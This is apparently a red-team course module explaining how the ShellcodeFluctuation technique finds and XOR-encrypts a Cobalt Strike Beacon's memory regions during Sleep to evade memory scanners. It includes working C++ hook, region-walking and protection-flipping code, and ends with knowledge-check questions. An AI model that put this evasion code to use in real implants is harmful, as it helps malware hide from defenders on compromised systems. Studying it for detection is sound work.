Module 6: Shellcode Region Tracking
Identifying shellcode allocation boundaries, using VirtualQuery for page-aligned operations, and supporting complex memory layouts.
Module Objective
Learn how ShellcodeFluctuation identifies the shellcode memory region boundaries when the MySleep hook fires, how VirtualQuery provides page-aligned region information, how to handle shellcode that spans multiple memory regions, and the challenges of tracking dynamically allocated sub-regions.
1. The Region Discovery Problem
When the Beacon shellcode calls Sleep and control transfers to MySleep, the hook handler needs to know exactly which memory region to encrypt. This is not always straightforward because:
Region Discovery Challenges
- The loader knows the allocation: the initial VirtualAlloc returns the base address and size. This is the simplest case
- Beacon may allocate additional memory: Cobalt Strike Beacon allocates heap memory for its own use, which also contains detectable artifacts
- Reflective loading changes the layout: if the shellcode is a reflective DLL, it maps sections at different addresses
- The hook runs in the shellcode's thread: we can use the thread's call stack or the return address to identify which region we are in
2. VirtualQuery: The Region Inspector
VirtualQuery is the primary API for discovering memory region properties. Given any address within a region, it returns the region's base address, size, protection, and type:
// VirtualQuery signature
SIZE_T VirtualQuery(
LPCVOID lpAddress, // Any address in the region
PMEMORY_BASIC_INFORMATION lpBuffer, // Output structure
SIZE_T dwLength // Size of output structure
);
// The MEMORY_BASIC_INFORMATION structure
typedef struct _MEMORY_BASIC_INFORMATION {
PVOID BaseAddress; // Base of the region of pages containing lpAddress
PVOID AllocationBase; // Base of the entire allocation
DWORD AllocationProtect; // Initial protection at VirtualAlloc time
SIZE_T RegionSize; // Size of contiguous pages with same attributes
DWORD State; // MEM_COMMIT, MEM_RESERVE, MEM_FREE
DWORD Protect; // Current protection
DWORD Type; // MEM_PRIVATE, MEM_MAPPED, MEM_IMAGE
} MEMORY_BASIC_INFORMATION;
Two fields are especially important for shellcode tracking:
| Field | Meaning | Use in Fluctuation |
|---|---|---|
| AllocationBase | The base address returned by the original VirtualAlloc call | Identifies the start of the entire shellcode allocation |
| RegionSize | Size of contiguous pages with identical protection/state/type | Defines how much memory to encrypt (may be less than total allocation if protection varies) |
3. Discovering Shellcode Boundaries at Hook Time
ShellcodeFluctuation can discover the shellcode region boundaries dynamically when the hook fires, using the return address on the stack:
// Dynamic region discovery using _ReturnAddress()
void WINAPI MySleep(DWORD dwMilliseconds) {
// The return address points into the shellcode that called Sleep
PVOID callerAddr = _ReturnAddress();
// Query the memory region containing the caller
MEMORY_BASIC_INFORMATION mbi;
VirtualQuery(callerAddr, &mbi, sizeof(mbi));
// mbi.AllocationBase = start of the shellcode allocation
// Now walk all committed regions in this allocation
LPVOID regionBase = mbi.AllocationBase;
SIZE_T totalSize = 0;
MEMORY_BASIC_INFORMATION walkMbi;
LPVOID walkAddr = regionBase;
while (VirtualQuery(walkAddr, &walkMbi, sizeof(walkMbi))) {
// Stop if we've left the allocation
if (walkMbi.AllocationBase != regionBase)
break;
// Only count committed regions
if (walkMbi.State == MEM_COMMIT) {
totalSize = (SIZE_T)((BYTE*)walkMbi.BaseAddress +
walkMbi.RegionSize - (BYTE*)regionBase);
}
walkAddr = (BYTE*)walkMbi.BaseAddress + walkMbi.RegionSize;
}
// Now we know: regionBase and totalSize
// Proceed with fluctuation...
}
Why Use _ReturnAddress()?
_ReturnAddress() is an MSVC compiler intrinsic (declared in <intrin.h>) that returns the address of the instruction in the caller that executes after the current function returns. When MySleep is called (via the hooked Sleep), that return address points into the Beacon shellcode. This gives us an address inside the shellcode allocation without needing to track it globally from the loader.
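The walk that MySleep performs can be studied without touching a live process. The sketch below is a portable model, not code from ShellcodeFluctuation: `MockRegion`, `QueryMock`, and `CommittedExtent` are hypothetical names, and `QueryMock` only stands in for VirtualQuery by looking up an address in a hand-written region table. It shows the same rule as the loop above: start at the allocation base, stop when the allocation base changes, and let only committed regions extend the total.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <optional>
#include <vector>

// Hypothetical subset of MEMORY_BASIC_INFORMATION used by the model.
struct MockRegion {
    std::uintptr_t baseAddress;     // start of this run of pages
    std::uintptr_t allocationBase;  // start of the allocation it belongs to
    std::size_t regionSize;         // size of the run in bytes
    bool committed;                 // true models MEM_COMMIT
};

// Stand-in for VirtualQuery: return the region that contains addr, if any.
inline std::optional<MockRegion> QueryMock(const std::vector<MockRegion>& map,
                                           std::uintptr_t addr) {
    for (const MockRegion& r : map) {
        if (addr >= r.baseAddress && addr - r.baseAddress < r.regionSize) {
            return r;
        }
    }
    return std::nullopt;
}

// Given any address inside an allocation, return the distance from the
// allocation base to the end of its last committed region (0 if unknown).
inline std::size_t CommittedExtent(const std::vector<MockRegion>& map,
                                   std::uintptr_t addrInside) {
    const std::optional<MockRegion> start = QueryMock(map, addrInside);
    if (!start) {
        return 0;
    }
    const std::uintptr_t allocBase = start->allocationBase;
    std::size_t extent = 0;
    std::uintptr_t cursor = allocBase;
    while (const std::optional<MockRegion> r = QueryMock(map, cursor)) {
        if (r->allocationBase != allocBase) {
            break;  // walked into a different allocation
        }
        if (r->committed) {
            extent = (r->baseAddress + r->regionSize) - allocBase;
        }
        cursor = r->baseAddress + r->regionSize;
    }
    return extent;
}
```

Note that a reserved (uncommitted) region in the middle of the allocation does not stop the walk; it simply does not extend the result, which matches the behavior of the loop in MySleep.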
4. Page Alignment and VirtualProtect
VirtualProtect operates on page boundaries. Understanding page alignment is critical for correct fluctuation:
// x86-64 page size
#define PAGE_SIZE 0x1000 // 4096 bytes
// VirtualProtect rounds addresses DOWN to page boundary
// and sizes UP to include all affected pages.
// Example:
// shellcodeBase = 0x1A0000 (page-aligned, from VirtualAlloc)
// shellcodeSize = 0x4C800 (not page-aligned)
// VirtualProtect(0x1A0000, 0x4C800, PAGE_READWRITE, &old)
// Actually affects pages 0x1A0000 through 0x1ECFFF
// (the last affected page starts at 0x1EC000)
// That's ceil(0x4C800 / 0x1000) = 77 pages
// VirtualAlloc always returns page-aligned addresses:
LPVOID base = VirtualAlloc(NULL, size, MEM_COMMIT | MEM_RESERVE,
PAGE_READWRITE);
// base is guaranteed to be 0x????0000 (64K aligned on Windows)
Page Alignment Guarantees
| API | Base Address Alignment | Size Alignment |
|---|---|---|
| VirtualAlloc | 64 KB (allocation granularity) | Rounded up to page size (4 KB) |
| VirtualProtect | Rounds down to page boundary | Rounds up to include full pages |
| VirtualQuery | Reports page-aligned regions | Reports page-aligned sizes |
Since VirtualAlloc returns 64K-aligned addresses and VirtualProtect rounds to page boundaries, the fluctuation operates cleanly on aligned memory regions. As long as the base and size passed to VirtualProtect come from the allocation itself, the rounding stays within the pages of that allocation and does not touch neighboring memory.
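The rounding rules can be checked with plain arithmetic. The following is a minimal sketch that assumes a fixed 4 KB page size (production code would query the system instead); `AlignDown`, `AlignUp`, `PageSpan`, and `AffectedPages` are illustrative names, not Windows APIs.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

// Assumed page size for x86-64 Windows; a power of two is required below.
constexpr std::uintptr_t kPageSize = 0x1000;

// Round an address down to the start of the page that contains it.
constexpr std::uintptr_t AlignDown(std::uintptr_t addr) {
    return addr & ~(kPageSize - 1);
}

// Round an address up to the next page boundary (unchanged if aligned).
constexpr std::uintptr_t AlignUp(std::uintptr_t addr) {
    return (addr + kPageSize - 1) & ~(kPageSize - 1);
}

struct PageSpan {
    std::uintptr_t firstPage;  // start address of the first affected page
    std::uintptr_t lastPage;   // start address of the last affected page
    std::size_t pageCount;     // number of pages in between, inclusive
};

// Pages touched by a protection change on the byte range [base, base + size).
inline PageSpan AffectedPages(std::uintptr_t base, std::size_t size) {
    assert(size > 0);
    const std::uintptr_t first = AlignDown(base);
    const std::uintptr_t end = AlignUp(base + size);  // one past the last page
    return PageSpan{first, end - kPageSize,
                    static_cast<std::size_t>((end - first) / kPageSize)};
}
```

For the example above, `AffectedPages(0x1A0000, 0x4C800)` yields a first page of 0x1A0000, a last page of 0x1EC000, and a count of 77.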
5. Multi-Region Shellcode
Complex implants may not have a single contiguous memory region. A reflective DLL loader, for example, maps different PE sections with different protections:
// Reflective DLL memory layout example:
// AllocationBase = 0x1A0000
//
// Region 1: 0x1A0000 - 0x1A0FFF PE headers (PAGE_READONLY)
// Region 2: 0x1A1000 - 0x1A5FFF .text (PAGE_EXECUTE_READ)
// Region 3: 0x1A6000 - 0x1A7FFF .rdata (PAGE_READONLY)
// Region 4: 0x1A8000 - 0x1A9FFF .data (PAGE_READWRITE)
// Region 5: 0x1AA000 - 0x1AAFFF .reloc (PAGE_READONLY)
// Each region has different protection. We need to:
// 1. Save each region's current protection
// 2. Flip ALL to RW
// 3. Encrypt ALL
// 4. After sleep: Decrypt ALL
// 5. Restore EACH region's original protection
To handle this, the fluctuation code must walk the entire allocation and process each region individually:
struct RegionInfo {
LPVOID base;
SIZE_T size;
DWORD originalProtect;
};
// Walk the allocation and collect all committed regions
std::vector<RegionInfo> CollectRegions(LPVOID allocationBase) {
std::vector<RegionInfo> regions;
MEMORY_BASIC_INFORMATION mbi;
LPVOID addr = allocationBase;
while (VirtualQuery(addr, &mbi, sizeof(mbi))) {
if (mbi.AllocationBase != allocationBase)
break;
if (mbi.State == MEM_COMMIT) {
regions.push_back({
mbi.BaseAddress,
mbi.RegionSize,
mbi.Protect
});
}
addr = (BYTE*)mbi.BaseAddress + mbi.RegionSize;
}
return regions;
}
// Encrypt all regions
void EncryptAllRegions(std::vector<RegionInfo>& regions, DWORD key) {
for (auto& r : regions) {
DWORD oldProt;
VirtualProtect(r.base, r.size, PAGE_READWRITE, &oldProt);
r.originalProtect = oldProt; // Save actual protection
xor32((BYTE*)r.base, r.size, key);
}
}
// Decrypt and restore all regions
void DecryptAllRegions(std::vector<RegionInfo>& regions, DWORD key) {
for (auto& r : regions) {
xor32((BYTE*)r.base, r.size, key);
DWORD dummy;
VirtualProtect(r.base, r.size, r.originalProtect, &dummy);
}
}
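The bookkeeping part of this pattern (save each region's protection, switch everything to read-write, later restore each region to what it had) can be modeled in isolation. This is a portable sketch with invented names (`Prot`, `ModelRegion`, `MakeWritable`, `RestoreProtections`); it changes fields in a vector and makes no system calls, so it only illustrates why a single blanket restore value would be wrong for a multi-section layout.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

// Simplified protection values for the model (not Windows constants).
enum class Prot : std::uint8_t { ReadOnly, ReadWrite, ExecuteRead };

struct ModelRegion {
    std::uintptr_t base;
    std::size_t size;
    Prot current;
};

// Switch every region to ReadWrite and return the previous protections,
// in the same order as the regions.
inline std::vector<Prot> MakeWritable(std::vector<ModelRegion>& regions) {
    std::vector<Prot> saved;
    saved.reserve(regions.size());
    for (ModelRegion& r : regions) {
        saved.push_back(r.current);
        r.current = Prot::ReadWrite;
    }
    return saved;
}

// Put back the protection each region had before MakeWritable ran.
inline void RestoreProtections(std::vector<ModelRegion>& regions,
                               const std::vector<Prot>& saved) {
    assert(saved.size() == regions.size());
    for (std::size_t i = 0; i < regions.size(); ++i) {
        regions[i].current = saved[i];
    }
}
```

Applied to the five-region layout shown earlier, the restore step returns .text to execute-read while the header, .rdata, and .reloc regions go back to read-only and .data stays read-write.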
6. Handling the Beacon Heap
Cobalt Strike Beacon allocates heap memory for its configuration, task buffers, and downloaded data. This heap data can contain IOCs (C2 URLs, decrypted task output, etc.) that scanners can find. The options for covering it range from ignoring the heap to tracking every implant allocation:
| Approach | What Gets Encrypted | Heap Coverage | Complexity |
|---|---|---|---|
| Single allocation only | The original VirtualAlloc region containing the shellcode | None: heap is unprotected | Simple |
| All private executable | All MEM_PRIVATE regions with execute permissions | Partial: misses RW heap data | Moderate |
| Full allocation walk | All committed regions under the same AllocationBase | Limited: covers only regions inside the shellcode's own allocation, not separate heap allocations | Moderate |
| Heap tracking | Hook HeapAlloc/VirtualAlloc to track all implant allocations | Full: covers all implant memory | High |
Practical Limitation
ShellcodeFluctuation's primary focus is the shellcode execution region (the code itself). Beacon's heap allocations for configuration and data buffers are separate and may not be covered by the basic fluctuation mechanism. More advanced solutions like Cobalt Strike's built-in Sleep Mask Kit provide broader coverage of Beacon-owned memory.
7. Thread Safety Considerations
If the implant uses multiple threads, the fluctuation mechanism must handle concurrency:
// Potential race condition:
//
// Thread 1 (Beacon): Calls Sleep -> MySleep encrypts shellcode
// Thread 2 (Worker): Still executing shellcode code
//
// If Thread 2 is running when Thread 1 encrypts, Thread 2
// will execute encrypted garbage and crash!
// ShellcodeFluctuation assumes single-threaded shellcode:
// Cobalt Strike Beacon calls Sleep from its main loop,
// and worker tasks complete before the sleep cycle.
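// For multi-threaded implants, a more robust approach.
// Not shown: g_fluctLock must be initialized once with
// InitializeCriticalSection, and every thread must increment and
// decrement g_activeThreads as it enters and leaves shellcode.
CRITICAL_SECTION g_fluctLock;
volatile LONG g_activeThreads = 0;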
void WINAPI MySleep_ThreadSafe(DWORD dwMilliseconds) {
EnterCriticalSection(&g_fluctLock);
// Wait for all other threads to reach a safe point
while (InterlockedCompareExchange(&g_activeThreads, 0, 0) > 1) {
LeaveCriticalSection(&g_fluctLock);
SwitchToThread();
EnterCriticalSection(&g_fluctLock);
}
// Safe to encrypt - only this thread is active in shellcode
// ... perform fluctuation cycle ...
LeaveCriticalSection(&g_fluctLock);
}
Single-Thread Assumption
In practice, ShellcodeFluctuation operates under the assumption that the Beacon is single-threaded at the point it calls Sleep. Cobalt Strike Beacon dispatches jobs synchronously in its main loop and only calls Sleep when all pending tasks are complete. This makes the single-thread assumption safe for the primary use case.
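The MySleep_ThreadSafe snippet reads g_activeThreads but does not show how that counter is kept up to date. One generic way to maintain such a counter is a scope guard that increments on entry and decrements on exit. The sketch below uses standard C++ atomics rather than the Interlocked functions, and `ActiveCounter` and `ActiveScope` are hypothetical names; it illustrates the counting pattern only and is not taken from ShellcodeFluctuation.

```cpp
#include <atomic>
#include <cassert>

// Counts how many threads are currently inside a tracked section.
class ActiveCounter {
public:
    void Enter() { count_.fetch_add(1, std::memory_order_acq_rel); }

    void Leave() {
        const int previous = count_.fetch_sub(1, std::memory_order_acq_rel);
        assert(previous > 0);  // Leave without a matching Enter is a bug
        (void)previous;        // silence unused warning when NDEBUG is set
    }

    // True when exactly one thread (the caller) is inside the section.
    bool OnlyCallerActive() const {
        return count_.load(std::memory_order_acquire) == 1;
    }

private:
    std::atomic<int> count_{0};
};

// RAII guard: the count is decremented even on early return or exception.
class ActiveScope {
public:
    explicit ActiveScope(ActiveCounter& counter) : counter_(counter) {
        counter_.Enter();
    }
    ~ActiveScope() { counter_.Leave(); }

    ActiveScope(const ActiveScope&) = delete;
    ActiveScope& operator=(const ActiveScope&) = delete;

private:
    ActiveCounter& counter_;
};
```

A counter like this only reports how many threads have registered themselves; it does not pause threads that never create a guard, which is why the single-thread assumption remains the simpler design.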
8. Region Tracking Summary
The complete region tracking approach used by ShellcodeFluctuation combines static initialization with dynamic verification:
// Complete region tracking flow in MySleep:
void WINAPI MySleep(DWORD dwMilliseconds) {
// Option A: Use pre-configured global state
// (Set during initialization by the loader)
LPVOID base = g_state.shellcodeBase;
SIZE_T size = g_state.shellcodeSize;
// Option B: Dynamic discovery (more robust)
// Uses _ReturnAddress() to find caller's allocation
MEMORY_BASIC_INFORMATION mbi = {};
// VirtualQuery returns 0 on failure; keep the global base in that case
if (VirtualQuery(_ReturnAddress(), &mbi, sizeof(mbi)))
base = mbi.AllocationBase;
// Walk to find total committed size...
// Validate: is this the expected region?
if (base != g_state.shellcodeBase) {
// Unexpected caller - could be a different thread
// or the shellcode relocated. Use global state as fallback.
base = g_state.shellcodeBase;
size = g_state.shellcodeSize;
}
// Proceed with fluctuation using (base, size)
FluctuateCycle(base, size, dwMilliseconds);
}
Key Takeaways
- VirtualQuery provides page-aligned region information for any address
- AllocationBase identifies the original allocation, enabling full-allocation walks
- Page alignment is guaranteed by the Windows Memory Manager for VirtualAlloc regions
- Multi-region support requires saving per-region original protections and restoring them individually
- Thread safety is assumed via single-thread behavior of the Beacon sleep loop
Knowledge Check
Q1: What does VirtualQuery's AllocationBase field represent?
Q2: Why might a reflective DLL's memory layout require per-region protection tracking?
Q3: How does ShellcodeFluctuation identify the shellcode region when the Sleep hook fires?